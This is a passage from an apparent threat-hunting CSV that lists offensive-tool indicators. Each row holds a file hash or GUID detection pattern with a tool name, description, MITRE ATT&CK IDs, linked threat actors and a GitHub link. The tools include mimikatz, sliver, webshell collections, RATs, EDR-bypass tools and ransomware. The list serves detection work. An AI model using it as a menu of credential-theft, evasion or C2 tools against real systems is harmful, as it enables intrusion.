Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21004" "*04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49*",".{0,1000}04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","21005" "*04c8a0077ac2c4db41e2bba0b7052fb1d0b492a6e301853b3e189223a989e1c7*",".{0,1000}04c8a0077ac2c4db41e2bba0b7052fb1d0b492a6e301853b3e189223a989e1c7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","21006" "*04ca7e137e1e9feead96a7df45bb67d5ab3de190*",".{0,1000}04ca7e137e1e9feead96a7df45bb67d5ab3de190.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","#filehash","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","21007" "*04d10aaec0489662bc61d17ed9d1e5b7a89a74faeedb428d1f80395feafef4c9*",".{0,1000}04d10aaec0489662bc61d17ed9d1e5b7a89a74faeedb428d1f80395feafef4c9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21008" "*04d10bef7b5d5a3c16782bc908ec5ea1ceacf33588c12d65ee4d314f6133d0f7*",".{0,1000}04d10bef7b5d5a3c16782bc908ec5ea1ceacf33588c12d65ee4d314f6133d0f7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21009" "*04DD48A0AFD6D6EA2969225DE9DDEF69EDB3DBC1D8C1AED2C4F12E9621C948F1*",".{0,1000}04DD48A0AFD6D6EA2969225DE9DDEF69EDB3DBC1D8C1AED2C4F12E9621C948F1.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","21011" "*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*",".{0,1000}04DFB6E4\-809E\-4C35\-88A1\-2CC5F1EBFEBD.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","#GUIDproject","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","21012" "*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*",".{0,1000}04DFB6E4\-809E\-4C35\-88A1\-2CC5F1EBFEBD.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - 
TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","#GUIDproject","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","21013" "*04e6af8c093849416d46aa2d45c30bdf3501676621c43d15e7200f219c580c55*",".{0,1000}04e6af8c093849416d46aa2d45c30bdf3501676621c43d15e7200f219c580c55.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","21015" "*04E8D9E98A7BAF3AFBA44E9FCFF34659979ED27AC3AE92EE2184F5963F339E32*",".{0,1000}04E8D9E98A7BAF3AFBA44E9FCFF34659979ED27AC3AE92EE2184F5963F339E32.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","21016" "*04eb0f500553c9d58de8f5a8bb102cba7dcb0d1e9a77baa4227237c49a5e81d8*",".{0,1000}04eb0f500553c9d58de8f5a8bb102cba7dcb0d1e9a77baa4227237c49a5e81d8.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","#filehash","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","21017" 
"*04f2d08d79da097f7783031a57aa6685e5bdbe7589dcdbff724df1d9bad41d53*",".{0,1000}04f2d08d79da097f7783031a57aa6685e5bdbe7589dcdbff724df1d9bad41d53.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21019" "*04FC654C-D89A-44F9-9E34-6D95CE152E9D*",".{0,1000}04FC654C\-D89A\-44F9\-9E34\-6D95CE152E9D.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","21020" "*050243af07ab26ee16ed59f35a1d7944db273a40aba1c3e70438c3a8e0d2a923*",".{0,1000}050243af07ab26ee16ed59f35a1d7944db273a40aba1c3e70438c3a8e0d2a923.{0,1000}","offensive_tool_keyword","HookSentry","tool for inspecting system DLLs loaded into processes - looking for functions hooked from AV/EDR.","T1055.001 - T1055 - T1057","TA0007 - TA0005","N/A","N/A","Defense Evasion","https://github.com/UmaRex01/HookSentry","1","0","#filehash","N/A","6","1","27","2","2025-04-02T12:30:58Z","2024-11-20T18:09:39Z","21022" "*05043d8400b0be454879f8d7f4c4455afa7ef1c9705176d1d95334f36e84bd53*",".{0,1000}05043d8400b0be454879f8d7f4c4455afa7ef1c9705176d1d95334f36e84bd53.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","21023" "*050720C033870D6BC6D8138D662A3AC0AC5B07858A428C594F81B7B1B55AB963*",".{0,1000}050720C033870D6BC6D8138D662A3AC0AC5B07858A428C594F81B7B1B55AB963.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","21024" "*050c8a0def9c19dbc64296f5a4834a902756ed06a740bdc7e0170a8748792bd5*",".{0,1000}050c8a0def9c19dbc64296f5a4834a902756ed06a740bdc7e0170a8748792bd5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD 
CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21025" "*050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23*",".{0,1000}050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21026" "*050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23*",".{0,1000}050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21027" "*050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23*",".{0,1000}050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21028" "*050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23*",".{0,1000}050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - 
TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21029" "*050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23*",".{0,1000}050d0065e439ca1d3b1ebe97f74cc4842f40a3b3da609ff3fdc52442af4e7b23.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21030" "*050dcd051a109b6bd8804e769242ec4e1c087bdd2fb45880c2affeebb630cf77*",".{0,1000}050dcd051a109b6bd8804e769242ec4e1c087bdd2fb45880c2affeebb630cf77.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","21031" "*051597cb4fc84251a039fe931235dc5e418a20a290e90f91fa4ffc974108bb0e*",".{0,1000}051597cb4fc84251a039fe931235dc5e418a20a290e90f91fa4ffc974108bb0e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21033" "*051b9812bd48685cd19ba31247a3cb50a845bb902feae2433ff1fd8840a6e520*",".{0,1000}051b9812bd48685cd19ba31247a3cb50a845bb902feae2433ff1fd8840a6e520.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows 
AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","21034" "*051d5f7fb8c577932d243da40e744e1e228d5f1b89c83613aa4e8a8ad5ee6b98*",".{0,1000}051d5f7fb8c577932d243da40e744e1e228d5f1b89c83613aa4e8a8ad5ee6b98.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","21035" "*052083681fa05830137dd07aa3778d52a98dca541c725a0cffccde43a14fed89*",".{0,1000}052083681fa05830137dd07aa3778d52a98dca541c725a0cffccde43a14fed89.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21036" "*0527a14f-1591-4d94-943e-d6d784a50549*",".{0,1000}0527a14f\-1591\-4d94\-943e\-d6d784a50549.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","0","#GUIDproject","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","21039" "*052C26C0-7979-4555-89CE-34C5CE8D8B34*",".{0,1000}052C26C0\-7979\-4555\-89CE\-34C5CE8D8B34.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","TA2541 - APT-C-36","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","0","#GUIDproject","N/A","10","10","92","39","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z","21040" "*0538b3096657777e14c5ac6296037b936df7fb375d32199b0ae1b7fe33b3d63b*",".{0,1000}0538b3096657777e14c5ac6296037b936df7fb375d32199b0ae1b7fe33b3d63b.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. 
ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#filehash","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","21041" "*053c976a6b035d2c3daefe986d293fcb1d92ffd0f535a649ee61218c66721555*",".{0,1000}053c976a6b035d2c3daefe986d293fcb1d92ffd0f535a649ee61218c66721555.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","21042" "*053e66e29158b7d72fcce76e452dff8b1b5cbeb90f40ddca171a1ddf88c14fef*",".{0,1000}053e66e29158b7d72fcce76e452dff8b1b5cbeb90f40ddca171a1ddf88c14fef.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21043" "*054f6b13f3cf2ca61c08262584bca599685344bf74979f7806da6351d5a1e4ec*",".{0,1000}054f6b13f3cf2ca61c08262584bca599685344bf74979f7806da6351d5a1e4ec.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21045" 
"*0556d3a1e4719382613891895582f8a392ccacfab6814bc9deafa9c99c86e553*",".{0,1000}0556d3a1e4719382613891895582f8a392ccacfab6814bc9deafa9c99c86e553.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","#filehash","N/A","8","1","N/A","N/A","N/A","N/A","21047" "*055BC73F-FCAE-4361-B035-2E156A101EA9*",".{0,1000}055BC73F\-FCAE\-4361\-B035\-2E156A101EA9.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","21048" "*055d93807dbb92adac4bfd63349ac634e7a214712115656f00d9a1750d98da52*",".{0,1000}055d93807dbb92adac4bfd63349ac634e7a214712115656f00d9a1750d98da52.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","#filehash","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","21049" "*056a00cd961e5d38f464d6a15393c92f3f0cef668e396f9595822e7147b4c25e*",".{0,1000}056a00cd961e5d38f464d6a15393c92f3f0cef668e396f9595822e7147b4c25e.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","#filehash","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","21050" "*05703420a4694ddc3d737d5f7dd589ff1288b05fec2bdc6f5b0f1227509429f9*",".{0,1000}05703420a4694ddc3d737d5f7dd589ff1288b05fec2bdc6f5b0f1227509429f9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21051" "*057432add809186a039ba449a5988101aad9f9e55119b90e34b49e9f14835b3a*",".{0,1000}057432add809186a039ba449a5988101aad9f9e55119b90e34b49e9f14835b3a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21052" "*05776513007563031e633e1e5820914bfdcac5df19fe7fc93be680df32f75362*",".{0,1000}05776513007563031e633e1e5820914bfdcac5df19fe7fc93be680df32f75362.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21054" "*057be14a7e848f100a489cc66a10416ffa70af9752745f95fa56c6df73c35d27*",".{0,1000}057be14a7e848f100a489cc66a10416ffa70af9752745f95fa56c6df73c35d27.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","21055" "*057e9cb126eccb5bc86dfd9d8b816ae77456987742f68d19eedcd4e3299ab217*",".{0,1000}057e9cb126eccb5bc86dfd9d8b816ae77456987742f68d19eedcd4e3299ab217.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21056" "*05842de51ede327c0f55df963f6de4e32ab88f43a73b9e0e1d827bc70199eff0*",".{0,1000}05842de51ede327c0f55df963f6de4e32ab88f43a73b9e0e1d827bc70199eff0.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - 
BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21058" "*05842de51ede327c0f55df963f6de4e32ab88f43a73b9e0e1d827bc70199eff0*",".{0,1000}05842de51ede327c0f55df963f6de4e32ab88f43a73b9e0e1d827bc70199eff0.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21059" "*058e00b9037854fd3a606bfaaf65c5705b21731acba25278bbe5138b5c736abd*",".{0,1000}058e00b9037854fd3a606bfaaf65c5705b21731acba25278bbe5138b5c736abd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21062" "*0592164ed8c8e6330431ba1f8a3eeee650af93d11b4320cfcfda75483b699c32*",".{0,1000}0592164ed8c8e6330431ba1f8a3eeee650af93d11b4320cfcfda75483b699c32.{0,1000}","offensive_tool_keyword","Invoke-GrabTheHash","Get the NTLM Hash for the User or Machine Account TGT held in your current session","T1558.004 - T1003.004","TA0006","N/A","N/A","Credential Access","https://github.com/Leo4j/Invoke-GrabTheHash","1","0","#filehash","N/A","8","1","6","1","2023-10-26T10:52:51Z","2023-08-22T12:14:53Z","21063" "*0599c7537d4b728cd234412440a11a6cc54297b3c7af59c1d0309850aca0da53*",".{0,1000}0599c7537d4b728cd234412440a11a6cc54297b3c7af59c1d0309850aca0da53.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
